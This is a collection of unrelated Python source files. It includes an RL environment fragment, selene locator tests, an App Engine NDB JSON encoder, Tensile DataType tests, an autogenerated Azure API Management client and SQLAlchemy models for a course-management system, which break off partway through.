b = Image.fromarray(np.uint8(a[:,:,0]*255), mode="L").resize((84,84), resample=Image.NEAREST)
c = Image.fromarray(np.uint8(a[:,:,1]*255), mode="L").resize((84,84), resample=Image.NEAREST)
d = Image.fromarray(np.uint8(a[:,:,2]*255), mode="L").resize((84,84), resample=Image.NEAREST)
a = np.stack([b,c,d],axis=2)
return a
def step(self,action):
penalty = self.moveChar(action)
reward,done = self.checkGoal()
state = self.renderEnv()
if reward == None:
print(done)
print(reward)
print(penalty)
return state,(reward+penalty),done
else:
return state,(reward+penalty),done |
py | 1a331806e7f444969a4081e8c2515495508167c8 | # MIT License
#
# Copyright (c) 2015-2020 Iakiv Kramarenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from selene.bys import by, by_css, by_name, by_link_text, by_partial_link_text, by_xpath, following_sibling, parent, \
first_child, by_text, by_partial_text, escape_text_quotes_for_xpath
def test_by_css():
assert by("a") == ('css selector', 'a')
assert by_css("span") == ('css selector', 'span')
def test_by_name():
assert by_name("test") == ('name', 'test')
def test_by_link_text():
assert by_link_text("text") == ('link text', 'text')
def test_by_partial_link_text():
assert by_partial_link_text("text") == ("partial link text", "text")
def test_by_xpath():
assert by_xpath("//a") == ('xpath', "//a")
def test_by_following_sibling():
assert following_sibling() == ("xpath", './following-sibling::*')
def test_by_parent():
assert parent() == ("xpath", "..")
def test_first_child():
assert first_child() == ("xpath", "./*[1]")
def test_by_text():
assert by_text("test") == ("xpath", './/*[text()[normalize-space(.) = concat("", "test")]]')
def test_by_partial_text():
assert by_partial_text("text") == ("xpath", './/*[text()[contains(normalize-space(.), concat("", "text"))]]')
def test_by_escape_text_quotes_for_xpath():
assert escape_text_quotes_for_xpath('test') == 'concat("", "test")'
|
py | 1a33188bfdcc8a569a5b6ef34c1ecc781bc42299 | # -*- coding: utf-8 -*-
"""
JSON encoder/decoder adapted for use with Google App Engine NDB.
Usage:
import ndb_json
# Serialize an ndb.Query into an array of JSON objects.
query = models.MyModel.query()
query_json = ndb_json.dumps(query)
# Convert into a list of Python dictionaries.
query_dicts = ndb_json.loads(query_json)
# Serialize an ndb.Model instance into a JSON object.
entity = query.get()
entity_json = ndb_json.dumps(entity)
# Convert into a Python dictionary.
entity_dict = ndb_json.loads(entity_json)
Dependencies:
- dateutil: https://pypi.python.org/pypi/python-dateutil
"""
__author__ = 'Eric Higgins'
__copyright__ = 'Copyright 2013-2016, Eric Higgins'
__email__ = '[email protected]'
import base64
import datetime
import json
import time
import types
import dateutil.parser
from google.appengine.ext import ndb
__all__ = (
'dump',
'dumps',
'loads',
'NdbDecoder',
'NdbEncoder',
)
def encode_model(obj):
"""Encode objects like ndb.Model which have a `.to_dict()` method."""
obj_dict = obj.to_dict()
for key, val in obj_dict.iteritems():
if isinstance(val, types.StringType):
try:
unicode(val)
except UnicodeDecodeError:
# Encode binary strings (blobs) to base64.
obj_dict[key] = base64.b64encode(val)
return obj_dict
def encode_generator(obj):
"""Encode generator-like objects, such as ndb.Query."""
return list(obj)
def encode_key_as_entity(obj):
"""Get the Entity from the ndb.Key for further encoding."""
# NOTE(erichiggins): Potentially poor performance for Models w/ many KeyProperty properties.
# NOTE(ronufryk): Potentially can cause circular references and "RuntimeError: maximum recursion depth exceeded"
return obj.get_async()
# Alias for backward-compatibility
encode_key = encode_key_as_entity
def encode_key_as_pair(obj):
"""Get the ndb.Key as a tuple of (kind, id) pairs."""
return obj.pairs()
def encode_key_as_urlsafe(obj):
"""Get the ndb.Key as URL-safe base64-encoded string."""
return obj.urlsafe()
def encode_future(obj):
"""Encode an ndb.Future instance."""
return obj.get_result()
def encode_datetime(obj):
"""Encode a datetime.datetime or datetime.date object as an ISO 8601 format string."""
# Reformat the date slightly for better JS compatibility.
# Offset-naive dates need 'Z' appended for JS.
# datetime.date objects don't have or need tzinfo, so don't append 'Z'.
zone = '' if getattr(obj, 'tzinfo', True) else 'Z'
return obj.isoformat() + zone
def encode_complex(obj):
"""Convert a complex number object into a list containing the real and imaginary values."""
return [obj.real, obj.imag]
def encode_basevalue(obj):
"""Retrieve the actual value from a ndb.model._BaseValue.
This is a convenience function to assist with the following issue:
https://code.google.com/p/appengine-ndb-experiment/issues/detail?id=208
"""
return obj.b_val
NDB_TYPE_ENCODING = {
ndb.MetaModel: encode_model,
ndb.Query: encode_generator,
ndb.QueryIterator: encode_generator,
ndb.Key: encode_key_as_entity,
ndb.Future: encode_future,
datetime.date: encode_datetime,
datetime.datetime: encode_datetime,
time.struct_time: encode_generator,
types.ComplexType: encode_complex,
ndb.model._BaseValue: encode_basevalue,
}
# Sort the types so any iteration is in a deterministic order
NDB_TYPES = sorted(NDB_TYPE_ENCODING.keys(), key=lambda t: t.__name__)
class NdbDecoder(json.JSONDecoder):
"""Extend the JSON decoder to add support for datetime objects."""
def __init__(self, **kwargs):
"""Override the default __init__ in order to specify our own parameters."""
json.JSONDecoder.__init__(self, object_hook=self.object_hook_handler, **kwargs)
def object_hook_handler(self, val):
"""Handles decoding of nested date strings."""
return {k: self.decode_date(v) for k, v in val.iteritems()}
def decode_date(self, val):
"""Tries to decode strings that look like dates into datetime objects."""
if isinstance(val, basestring) and val.count('-') == 2 and len(val) > 9:
try:
dt = dateutil.parser.parse(val)
# Check for UTC.
if val.endswith(('+00:00', '-00:00', 'Z')):
# Then remove tzinfo for gae, which is offset-naive.
dt = dt.replace(tzinfo=None)
return dt
except (TypeError, ValueError):
pass
return val
def decode(self, val):
"""Override of the default decode method that also uses decode_date."""
# First try the date decoder.
new_val = self.decode_date(val)
if val != new_val:
return new_val
# Fall back to the default decoder.
return json.JSONDecoder.decode(self, val)
class NdbEncoder(json.JSONEncoder):
"""Extend the JSON encoder to add support for NDB Models."""
def __init__(self, **kwargs):
self._ndb_type_encoding = NDB_TYPE_ENCODING.copy()
keys_as_entities = kwargs.pop('ndb_keys_as_entities', False)
keys_as_pairs = kwargs.pop('ndb_keys_as_pairs', False)
keys_as_urlsafe = kwargs.pop('ndb_keys_as_urlsafe', False)
# Validate that only one of three flags is True
if ((keys_as_entities and keys_as_pairs)
or (keys_as_entities and keys_as_urlsafe)
or (keys_as_pairs and keys_as_urlsafe)):
raise ValueError('Only one of arguments ndb_keys_as_entities, ndb_keys_as_pairs, ndb_keys_as_urlsafe can be True')
if keys_as_pairs:
self._ndb_type_encoding[ndb.Key] = encode_key_as_pair
elif keys_as_urlsafe:
self._ndb_type_encoding[ndb.Key] = encode_key_as_urlsafe
else:
self._ndb_type_encoding[ndb.Key] = encode_key_as_entity
json.JSONEncoder.__init__(self, **kwargs)
def default(self, obj):
"""Overriding the default JSONEncoder.default for NDB support."""
obj_type = type(obj)
# NDB Models return a repr to calls from type().
if obj_type not in self._ndb_type_encoding:
if hasattr(obj, '__metaclass__'):
obj_type = obj.__metaclass__
else:
# Try to encode subclasses of types
for ndb_type in NDB_TYPES:
if isinstance(obj, ndb_type):
obj_type = ndb_type
break
fn = self._ndb_type_encoding.get(obj_type)
if fn:
return fn(obj)
return json.JSONEncoder.default(self, obj)
def dumps(ndb_model, **kwargs):
"""Custom json dumps using the custom encoder above."""
return NdbEncoder(**kwargs).encode(ndb_model)
def dump(ndb_model, fp, **kwargs):
"""Custom json dump using the custom encoder above."""
for chunk in NdbEncoder(**kwargs).iterencode(ndb_model):
fp.write(chunk)
def loads(json_str, **kwargs):
"""Custom json loads function that converts datetime strings."""
return NdbDecoder(**kwargs).decode(json_str)
|
py | 1a331b11e0db92c55c044fe675728d7ab1258e1d | ################################################################################
# Copyright (C) 2019 Advanced Micro Devices, Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell cop-
# ies of the Software, and to permit persons to whom the Software is furnished
# to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IM-
# PLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNE-
# CTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
################################################################################
from __future__ import print_function
import pytest
from Tensile.DataType import DataType
def test_init_single():
expected = DataType('S')
assert DataType('single') == expected
assert DataType('Float') == expected
assert DataType('tensileDataTypeFloat') == expected
def test_init_double():
expected = DataType('D')
assert DataType('double') == expected
assert DataType('Double') == expected
assert DataType('tensileDataTypeDouble') == expected
def test_init_complexSingle():
expected = DataType('C')
assert DataType('complexSingle') == expected
assert DataType('complexFloat') == expected
assert DataType('tensileDataTypeComplexFloat') == expected
def test_init_complexDouble():
expected = DataType('Z')
assert DataType('complexDouble') == expected
assert DataType('complexDouble') == expected
assert DataType('tensileDataTypeComplexDouble') == expected
def test_init_half():
expected = DataType('H')
assert DataType('half') == expected
assert DataType('Half') == expected
assert DataType('tensileDataTypeHalf') == expected
def test_init_i8():
expected = DataType('4xi8')
assert DataType('int8x4') == expected
assert DataType('Int8x4') == expected
assert DataType('tensileDataTypeInt8x4') == expected
def test_init_i32():
expected = DataType('I')
assert DataType('int32') == expected
assert DataType('Int32') == expected
assert DataType('tensileDataTypeInt32') == expected
def test_single():
obj = DataType(0)
assert obj.toChar() == 'S'
assert obj.toName() == 'single'
assert obj.toEnum() == 'Float'
assert obj.toOpenCL() == 'float'
assert obj.toHIP() == 'float'
assert obj.toDevice("") == 'float'
assert obj.toCpp() == 'float'
assert obj.getLibString() == 'tensileDataTypeFloat'
assert obj.numBytes() == 4
assert obj.isReal()
def test_double():
obj = DataType(1)
assert obj.toChar() == 'D'
assert obj.toName() == 'double'
assert obj.toEnum() == 'Double'
assert obj.toOpenCL() == 'double'
assert obj.toHIP() == 'double'
assert obj.toDevice("") == 'double'
assert obj.toCpp() == 'double'
assert obj.getLibString() == 'tensileDataTypeDouble'
assert obj.numBytes() == 8
assert obj.isReal()
def test_complexSingle():
obj = DataType(2)
assert obj.toChar() == 'C'
assert obj.toName() == 'complexSingle'
assert obj.toEnum() == 'ComplexFloat'
assert obj.toOpenCL() == 'float2'
assert obj.toHIP() == 'TensileComplexFloat'
assert obj.toDevice("") == 'TensileComplexFloat'
assert obj.toCpp() == 'TensileComplexFloat'
assert obj.getLibString() == 'tensileDataTypeComplexFloat'
assert obj.numBytes() == 8
assert not obj.isReal()
def test_complexDouble():
obj = DataType(3)
assert obj.toChar() == 'Z'
assert obj.toName() == 'complexDouble'
assert obj.toEnum() == 'ComplexDouble'
assert obj.toOpenCL() == 'double2'
assert obj.toHIP() == 'TensileComplexDouble'
assert obj.toDevice("") == 'TensileComplexDouble'
assert obj.toCpp() == 'TensileComplexDouble'
assert obj.getLibString() == 'tensileDataTypeComplexDouble'
assert obj.numBytes() == 16
assert not obj.isReal()
def test_half():
obj = DataType(4)
assert obj.toChar() == 'H'
assert obj.toName() == 'half'
assert obj.toEnum() == 'Half'
assert obj.toOpenCL() == 'ERROR'
assert obj.toHIP() == 'tensile_half'
assert obj.toDevice("OCL") == 'ERROR'
assert obj.toDevice("") == 'tensile_half'
assert obj.toCpp() == 'TensileHalf'
assert obj.getLibString() == 'tensileDataTypeHalf'
assert obj.numBytes() == 2
assert obj.isReal()
def test_int8():
obj = DataType(5)
assert obj.toChar() == '4xi8'
assert obj.toName() == 'int8x4'
assert obj.toEnum() == 'Int8x4'
assert obj.toOpenCL() == 'ERROR'
assert obj.toHIP() == 'uint32_t'
assert obj.toDevice("OCL") == 'ERROR'
assert obj.toDevice("") == 'uint32_t'
assert obj.toCpp() == 'TensileInt8x4'
assert obj.getLibString() == 'tensileDataTypeInt8x4'
assert obj.numBytes() == 4
assert obj.isReal()
def test_int32():
obj = DataType(6)
assert obj.toChar() == 'I'
assert obj.toName() == 'int32'
assert obj.toEnum() == 'Int32'
assert obj.toOpenCL() == 'ERROR'
assert obj.toHIP() == 'int32_t'
assert obj.toDevice("OCL") == 'ERROR'
assert obj.toDevice("") == 'int32_t'
assert obj.toCpp() == 'TensileInt32'
assert obj.getLibString() == 'tensileDataTypeInt32'
assert obj.numBytes() == 4
assert obj.isReal()
def test_cmp():
assert DataType('single') == DataType('S')
assert not DataType('S') != DataType(0)
assert DataType('Float') < DataType('Double')
assert not DataType('tensileDataTypeFloat') > DataType('Z')
assert DataType('half') >= DataType('ComplexFloat')
assert not DataType('int32') <= DataType('tensileDataTypeInt8x4')
def test_bounds():
with pytest.raises(Exception):
DataType(10)
|
py | 1a331b6e0fcce1551964b2853b33766abe956cf0 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class SignUpSettingsOperations:
"""SignUpSettingsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.apimanagement.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get_entity_tag(
self,
resource_group_name: str,
service_name: str,
**kwargs
) -> bool:
"""Gets the entity state (Etag) version of the SignUpSettings.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param service_name: The name of the API Management service.
:type service_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: bool, or the result of cls(response)
:rtype: bool
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01-preview"
accept = "application/json"
# Construct URL
url = self.get_entity_tag.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str', max_length=50, min_length=1, pattern=r'^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
if cls:
return cls(pipeline_response, None, response_headers)
return 200 <= response.status_code <= 299
get_entity_tag.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/portalsettings/signup'} # type: ignore
async def get(
self,
resource_group_name: str,
service_name: str,
**kwargs
) -> "models.PortalSignupSettings":
"""Get Sign Up Settings for the Portal.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param service_name: The name of the API Management service.
:type service_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PortalSignupSettings, or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.PortalSignupSettings
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.PortalSignupSettings"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str', max_length=50, min_length=1, pattern=r'^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
deserialized = self._deserialize('PortalSignupSettings', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/portalsettings/signup'} # type: ignore
async def update(
self,
resource_group_name: str,
service_name: str,
if_match: str,
enabled: Optional[bool] = None,
terms_of_service: Optional["models.TermsOfServiceProperties"] = None,
**kwargs
) -> None:
"""Update Sign-Up settings.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param service_name: The name of the API Management service.
:type service_name: str
:param if_match: ETag of the Entity. ETag should match the current entity state from the header
response of the GET request or it should be * for unconditional update.
:type if_match: str
:param enabled: Allow users to sign up on a developer portal.
:type enabled: bool
:param terms_of_service: Terms of service contract properties.
:type terms_of_service: ~azure.mgmt.apimanagement.models.TermsOfServiceProperties
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_parameters = models.PortalSignupSettings(enabled=enabled, terms_of_service=terms_of_service)
api_version = "2020-06-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str', max_length=50, min_length=1, pattern=r'^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_parameters, 'PortalSignupSettings')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/portalsettings/signup'} # type: ignore
async def create_or_update(
self,
resource_group_name: str,
service_name: str,
if_match: Optional[str] = None,
enabled: Optional[bool] = None,
terms_of_service: Optional["models.TermsOfServiceProperties"] = None,
**kwargs
) -> "models.PortalSignupSettings":
"""Create or Update Sign-Up settings.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param service_name: The name of the API Management service.
:type service_name: str
:param if_match: ETag of the Entity. Not required when creating an entity, but required when
updating an entity.
:type if_match: str
:param enabled: Allow users to sign up on a developer portal.
:type enabled: bool
:param terms_of_service: Terms of service contract properties.
:type terms_of_service: ~azure.mgmt.apimanagement.models.TermsOfServiceProperties
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PortalSignupSettings, or the result of cls(response)
:rtype: ~azure.mgmt.apimanagement.models.PortalSignupSettings
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.PortalSignupSettings"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_parameters = models.PortalSignupSettings(enabled=enabled, terms_of_service=terms_of_service)
api_version = "2020-06-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'serviceName': self._serialize.url("service_name", service_name, 'str', max_length=50, min_length=1, pattern=r'^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_parameters, 'PortalSignupSettings')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('PortalSignupSettings', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/portalsettings/signup'} # type: ignore
|
py | 1a331b88cd3c2f1269888652fd586af5c926cf8f | import base64
import copy
import os
from datetime import datetime, timedelta
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.orm import deferred
from sqlalchemy_json import MutableJson
from anubis.utils.data import rand
db = SQLAlchemy()
THEIA_DEFAULT_OPTIONS = {
"autosave": True,
"persistent_storage": False,
"network_policy": "os-student",
"resources": {
"requests": {"cpu": "300m", "memory": "300Mi"},
"limits": {"cpu": "2", "memory": "500Mi"},
},
}
def default_id(max_len=None) -> db.Column:
return db.Column(
db.String(128), primary_key=True, default=lambda: rand(max_len or 32)
)
class Config(db.Model):
__tablename__ = "anubis_config"
# Fields
key = db.Column(db.String(128), primary_key=True)
value = db.Column(db.String(2048))
@property
def data(self):
return {
"key": self.key,
"value": self.value,
}
class User(db.Model):
__tablename__ = "user"
# id
id = default_id()
# Fields
netid = db.Column(db.String(128), primary_key=True, unique=True, index=True)
github_username = db.Column(db.TEXT, index=True)
name = db.Column(db.TEXT)
is_superuser = db.Column(db.Boolean, nullable=False, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
ta_for_course = db.relationship(
"TAForCourse", cascade="all,delete", backref="owner"
)
professor_for_course = db.relationship(
"ProfessorForCourse", cascade="all,delete", backref="owner"
)
in_course = db.relationship("InCourse", cascade="all,delete", backref="owner")
assignment_repos = db.relationship(
"AssignmentRepo", cascade="all,delete", backref="owner"
)
assigned_student_questions = db.relationship(
"AssignedStudentQuestion", cascade="all,delete", backref="owner"
)
submissions = db.relationship("Submission", cascade="all,delete", backref="owner")
theia_sessions = db.relationship(
"TheiaSession", cascade="all,delete", backref="owner"
)
late_exceptions = db.relationship(
"LateException", cascade="all,delete", backref="user"
)
@property
def data(self):
from anubis.lms.courses import get_user_permissions
return {
"id": self.id,
"netid": self.netid,
"github_username": self.github_username,
"name": self.name,
**get_user_permissions(self),
}
def __repr__(self):
return self.__str__()
def __str__(self):
return f"<User {self.netid} {self.github_username}>"
class Course(db.Model):
__tablename__ = "course"
# id
id = default_id()
# Fields
name = db.Column(db.TEXT, nullable=False)
course_code = db.Column(db.TEXT, nullable=False)
semester = db.Column(db.TEXT, nullable=True)
section = db.Column(db.TEXT, nullable=True)
professor_display_name = db.Column(db.TEXT)
autograde_tests_repo = db.Column(
db.TEXT,
nullable=False,
default="https://github.com/os3224/anubis-assignment-tests",
)
github_repo_required = db.Column(db.Boolean, default=True)
theia_default_image = db.Column(
db.TEXT, nullable=False, default="registry.digitalocean.com/anubis/theia-xv6"
)
theia_default_options = db.Column(
MutableJson, default=lambda: copy.deepcopy(THEIA_DEFAULT_OPTIONS)
)
github_org = db.Column(db.TEXT, default="os3224")
join_code = db.Column(db.String(256), unique=True)
display_visuals = db.Column(db.Boolean, default=True)
assignments = db.relationship("Assignment", cascade="all,delete", backref="course")
ta_for_course = db.relationship(
"TAForCourse", cascade="all,delete", backref="course"
)
professor_for_course = db.relationship(
"ProfessorForCourse", cascade="all,delete", backref="course"
)
in_course = db.relationship("InCourse", cascade="all,delete", backref="course")
lecture_notes = db.relationship(
"LectureNotes", cascade="all,delete", backref="course"
)
static_files = db.relationship("StaticFile", cascade="all,delete", backref="course")
theia_sessions = db.relationship(
"TheiaSession", cascade="all,delete", backref="course"
)
@property
def total_assignments(self):
return self.open_assignments
@property
def open_assignments(self):
now = datetime.now()
return Assignment.query.filter(
Assignment.course_id == self.id,
Assignment.release_date <= now,
Assignment.hidden == False,
).count()
@property
def data(self):
return {
"id": self.id,
"name": self.name,
"course_code": self.course_code,
"section": self.section,
"professor_display_name": self.professor_display_name,
"total_assignments": self.total_assignments,
"open_assignment": self.open_assignments,
"join_code": self.id[:6],
}
class TAForCourse(db.Model):
__tablename__ = "ta_for_course"
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), primary_key=True)
@property
def data(self):
return {
"id": self.course.id,
"name": self.course.name,
}
class ProfessorForCourse(db.Model):
__tablename__ = "professor_for_course"
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), primary_key=True)
@property
def data(self):
return {
"id": self.course.id,
"name": self.course.name,
}
class InCourse(db.Model):
__tablename__ = "in_course"
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), primary_key=True)
class Assignment(db.Model):
__tablename__ = "assignment"
# id
id = default_id()
# Foreign Keys
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), index=True)
# Fields
name = db.Column(db.TEXT, nullable=False, index=True)
hidden = db.Column(db.Boolean, default=False)
description = db.Column(db.TEXT, nullable=True)
unique_code = db.Column(
db.String(8),
unique=True,
default=lambda: base64.b16encode(os.urandom(4)).decode().lower(),
)
